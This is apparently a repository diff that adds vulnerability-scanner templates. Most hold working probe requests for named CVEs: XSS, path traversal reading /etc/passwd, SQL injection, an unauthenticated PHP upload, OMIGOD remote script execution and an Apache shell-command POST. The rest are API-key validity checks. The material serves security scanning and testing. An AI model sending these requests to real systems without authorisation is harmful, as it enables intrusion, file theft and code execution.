- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000142
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2016-1000143.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2016-1000143
info:
name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=780
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000143
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

11
CVE-2018-15473.yaml
View File

@ -1,8 +1,8 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
@ -21,4 +21,9 @@ network:
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7].*'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'

32
CVE-2018-9205.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
tags: cve,cve2018,lfi,drupal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-9205
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

50
CVE-2021-24499.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2021-24499
info:
name: Workreap WordPress theme - unauthenticated RCE
author: daffainfo
severity: critical
description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
reference:
- https://github.com/RyouYoo/CVE-2021-24499
- https://nvd.nist.gov/vuln/detail/CVE-2021-24499
tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-24499
cwe-id: CWE-434
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9
X-Requested-With: XMLHttpRequest
-----------------------------cd0dc6bdc00b1cf9
Content-Disposition: form-data; name="action"
workreap_award_temp_file_uploader
-----------------------------cd0dc6bdc00b1cf9
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php
<?php echo md5("CVE-2021-24499"); ?>
-----------------------------cd0dc6bdc00b1cf9--
- |
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "71abe5077dae2754c36d731cc1534d4d"

37
CVE-2021-30049.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-30049
info:
name: SysAid Technologies 20.3.64 b14 Reflected XSS
author: daffainfo
severity: medium
description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
reference:
- https://eh337.net/2021/03/30/sysaid/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
tags: cve,cve2021,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-30049
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

68
CVE-2021-38647.yaml Normal file
View File

@ -0,0 +1,68 @@
id: CVE-2021-38647
info:
name: OMIGOD - Open Management Infrastructure RCE
author: daffainfo,xstp
severity: critical
tags: cve,cve2021,rce,omi,microsoft
description: Open Management Infrastructure Remote Code Execution Vulnerability
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-38647
requests:
- raw:
- |
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
<s:Header>
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"/>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteScript_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:Script>aWQ=</p:Script>
<p:Arguments/>
<p:timeout>0</p:timeout>
<p:b64encoded>true</p:b64encoded>
</p:ExecuteScript_INPUT>
</s:Body>
</s:Envelope>
matchers:
- type: word
words:
- '<p:StdOut>'
- 'uid=0(root) gid=0(root) groups=0'
condition: and

32
CVE-2021-39316.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-39316
info:
name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
author: daffainfo
severity: high
description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

37
CVE-2021-40868.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
tags: cve,cve2021,xss,cloudron
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-40868
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

32
CVE-2021-40960.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
reference:
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
tags: cve,cve2021,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-40960
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

40
CVE-2021-41648.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-41648
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
author: daffainfo
severity: high
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41648
tags: cve,cve2021,sqli
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41648
cwe-id: CWE-89
requests:
- method: POST
path:
- "{{BaseURL}}/action.php"
body: "proId=1'&addToCart=1"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "Warning: mysqli_num_rows() expects parameter 1 to be"
- "xdebug-error xe-warning"
part: body
condition: and
- type: status
status:
- 200

39
CVE-2021-41649.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-41649
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
author: daffainfo
severity: critical
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41649
tags: cve,cve2021,sqli
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-41649
cwe-id: CWE-89
requests:
- method: POST
path:
- "{{BaseURL}}/homeaction.php"
body: "cat_id=4'&get_seleted_Category=1"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "Warning: mysqli_num_rows() expects parameter 1 to be"
- "xdebug-error xe-warning"
part: body
condition: and
- type: status
status:
- 200

47
CVE-2021-41773.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-41773
info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
tags: cve,cve2021,lfi,rce,apache,misconfig
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
requests:
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:
- "root:.*:0:0"
- type: word
name: RCE
words:
- "CVE-2021-41773-POC"

31
api-abuseipdb.yaml Normal file
View File

@ -0,0 +1,31 @@
id: api-abuseipdb
info:
name: AbuseIPDB API Test
author: daffainfo
severity: info
reference:
- https://docs.abuseipdb.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
tags: token-spray,abuseipdb
self-contained: true
requests:
- raw:
- |
POST https://api.abuseipdb.com/api/v2/report HTTP/1.1
Host: api.abuseipdb.com
Key: {{token}}
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root.
matchers:
- type: word
part: body
words:
- 'data":'
- 'ipAddress":'
condition: and

26
api-alienvault.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-alienvault
info:
name: AlienVault Open Threat Exchange (OTX) API Test
author: daffainfo
severity: info
reference:
- https://otx.alienvault.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
tags: token-spray,alienvault
self-contained: true
requests:
- raw:
- |
GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1
Host: otx.alienvault.com
X-OTX-API-KEY: {{token}}
matchers:
- type: word
part: body
words:
- '"$schema":'
- '"properties":'
condition: and

26
api-aniapi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-aniapi
info:
name: AniAPI API Test
author: daffainfo
severity: info
reference:
- https://aniapi.com/docs/authentication
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
tags: token-spray,aniapi
self-contained: true
requests:
- method: GET
path:
- "https://api.aniapi.com/v1/auth/me"
headers:
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"username":'
- '"data":'
condition: and

21
api-cooperhewitt.yaml Normal file
View File

@ -0,0 +1,21 @@
id: api-cooperhewitt
info:
name: Cooper Hewitt API
author: daffainfo
severity: info
reference:
- https://collection.cooperhewitt.org/api/methods/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
tags: token-spray,cooperhewitt
self-contained: true
requests:
- method: GET
path:
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
matchers:
- type: status
status:
- 200

25
api-covalent.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-covalent
info:
name: Covalent API Test
author: daffainfo
severity: info
reference:
- https://www.covalenthq.com/docs/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
tags: token-spray,covalent
self-contained: true
requests:
- method: GET
path:
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
matchers:
- type: word
part: body
words:
- '"address":'
- '"updated_at":'
- '"next_update_at":'
condition: and

21
api-dribbble.yaml Normal file
View File

@ -0,0 +1,21 @@
id: api-dribbble
info:
name: Dribbble API Test
author: daffainfo
severity: info
reference:
- https://developer.dribbble.com/v2/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
tags: token-spray,dribbble
self-contained: true
requests:
- method: GET
path:
- "https://api.dribbble.com/v2/user?access_token={{token}}"
matchers:
- type: status
status:
- 200

31
api-etherscan.yaml Normal file
View File

@ -0,0 +1,31 @@
id: api-etherscan
info:
name: Etherscan API Test
author: daffainfo
severity: info
reference:
- https://docs.etherscan.io/
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
tags: token-spray,etherscan
self-contained: true
requests:
- method: GET
path:
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'Invalid API Key'
- type: word
part: body
words:
- '"status":'
- '"message":"OK"'
condition: and

21
api-europeana.yaml Normal file
View File

@ -0,0 +1,21 @@
id: api-europeana
info:
name: Europeana API Test
author: daffainfo
severity: info
reference:
- https://pro.europeana.eu/page/search
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
tags: token-spray,europeana
self-contained: true
requests:
- method: GET
path:
- "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets"
matchers:
- type: status
status:
- 200

28
api-iconfinder.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-iconfinder
info:
name: IconFinder API Test
author: daffainfo
severity: info
reference:
- https://developer.iconfinder.com/reference/overview-1
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
tags: token-spray,iconfinder
self-contained: true
requests:
- raw:
- |
GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
Host: api.iconfinder.com
Accept: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"icons":'
- '"is_icon_glyph":'
- '"download_url":'
condition: and

25
api-iucn.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-iucn
info:
name: IUCN API Test
author: daffainfo
severity: info
reference:
- http://apiv3.iucnredlist.org/api/v3/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
tags: token-spray,iucn
self-contained: true
requests:
- method: GET
path:
- "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}"
matchers:
- type: word
part: body
words:
- 'taxonid'
- 'scientific_name'
- 'subspecies'
condition: and

34
api-micro-user-service.yaml Normal file
View File

@ -0,0 +1,34 @@
id: api-micro-user-service
info:
name: Micro User Service API Test
author: daffainfo
severity: info
reference:
- https://m3o.com/user
- https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
tags: token-spray,micro-user-service
self-contained: true
requests:
- raw:
- |
POST https://api.m3o.com/v1/user/Read HTTP/1.1
Host: api.m3o.com
Content-Type: application/json
Authorization: Bearer {{token}}
Content-Length: 21
{
"id": "usrid-1"
}
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"created":'
- '"updated":'
condition: and

Some files were not shown because too many files have changed in this diff Show More